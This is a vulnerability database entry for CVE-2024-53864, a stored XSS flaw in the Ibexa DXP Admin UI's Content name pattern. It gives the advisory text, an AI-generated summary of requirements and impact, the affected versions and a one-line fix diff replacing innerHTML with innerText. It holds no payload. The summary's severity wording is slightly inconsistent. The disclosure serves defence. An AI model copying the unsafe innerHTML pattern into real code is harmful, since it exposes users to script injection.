CVE-2024-53864
Description
Ibexa Admin UI Bundle is all the necessary parts to run the Ibexa DXP Back Office interface. The Content name pattern is used to build Content names from one or more fields. An XSS vulnerability has been found in this mechanism. Content edit permission is required to exploit it. After the fix, any existing injected XSS will not run. This issue has been patched in version 4.6.14. All users are advised to upgrade. There are no known workarounds for this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
XSS vulnerability in Ibexa DXP Admin UI's Content name pattern allows stored XSS with content edit privileges; patched in v4.6.14.
Vulnerability
Overview
The Content name pattern in Ibexa Admin UI Bundle is used to dynamically build Content names from one or more fields. CVE-2024-53864 describes a stored Cross-Site Scripting (XSS) vulnerability within this mechanism. An attacker who possesses content edit permissions can inject malicious JavaScript into a field that is part of the name pattern. When the content is subsequently rendered (e.g., in the Back Office interface), the injected script executes in the context of the victim's session, potentially leading to data theft or further compromise [3][4].
Exploitation
Requirements
To exploit the vulnerability, an attacker must have content edit privileges in the Ibexa DXP system. No additional network position or authentication bypass is required; the attack is performed through normal content editing workflows. The injected payload is stored in the database and triggers whenever the affected content's name is displayed, such as in list views, breadcrumbs, or other areas that render the Content name pattern [3][4].
Impact
Successful exploitation enables arbitrary JavaScript execution within the browser of any user viewing the manipulated content name. This can lead to session hijacking, forced actions on behalf of the victim, or exposure of sensitive information displayed in the same administrative interface. The severity is rated Medium (CVSS score not explicitly given, but described as high in advisory [4]) because exploitation requires prior authentication with content edit permissions, limiting the attack surface to trusted users or those who have already compromised an editor account.
Mitigation
The vulnerability is patched in version 4.6.14 of the Ibexa Admin UI Bundle. Users running Ibexa DXP v4.6.* should upgrade to this version immediately. Ibexa DXP v3.3.* is not affected by this specific issue [4]. No workarounds are available; the fix ensures that any previously injected XSS payloads will no longer execute [1][3]. As part of a broader security release (Ibexa SA-2024-006), other critical fixes were also included, making the upgrade strongly recommended [4].
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
ibexa/admin-uiPackagist | >= 4.6.0, < 4.6.14 | 4.6.14 |
Affected products
3Patches
2714b80ab1f168ec824a8cf06IBX-9181: Changed innerHTML to innerText
1 file changed · +1 −1
src/bundle/Resources/public/js/scripts/helpers/tooltips.helper.js+1 −1 modified@@ -82,7 +82,7 @@ const modifyPopperConfig = (iframe, defaultBsPopperConfig) => { const getTextHeight = (text, styles) => { const tag = doc.createElement('div'); - tag.innerHTML = text; + tag.innerText = text; for (const key in styles) { tag.style[key] = styles[key];
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- github.com/advisories/GHSA-8w3p-gf85-qcchghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2024-53864ghsaADVISORY
- developers.ibexa.co/security-advisories/ibexa-sa-2024-006-vulnerabilities-in-content-name-pattern-commerce-shop-and-varnish-vhost-templatesnvdWEB
- doc.ibexa.co/en/latest/update_and_migration/from_4.6/update_from_4.6/nvdWEB
- github.com/ibexa/admin-ui/commit/8ec824a8cf06c566ed88e4c21cc66f7ed42649fcnvdWEB
- github.com/ibexa/admin-ui/security/advisories/GHSA-8w3p-gf85-qcchnvdWEB
News mentions
0No linked articles in our index yet.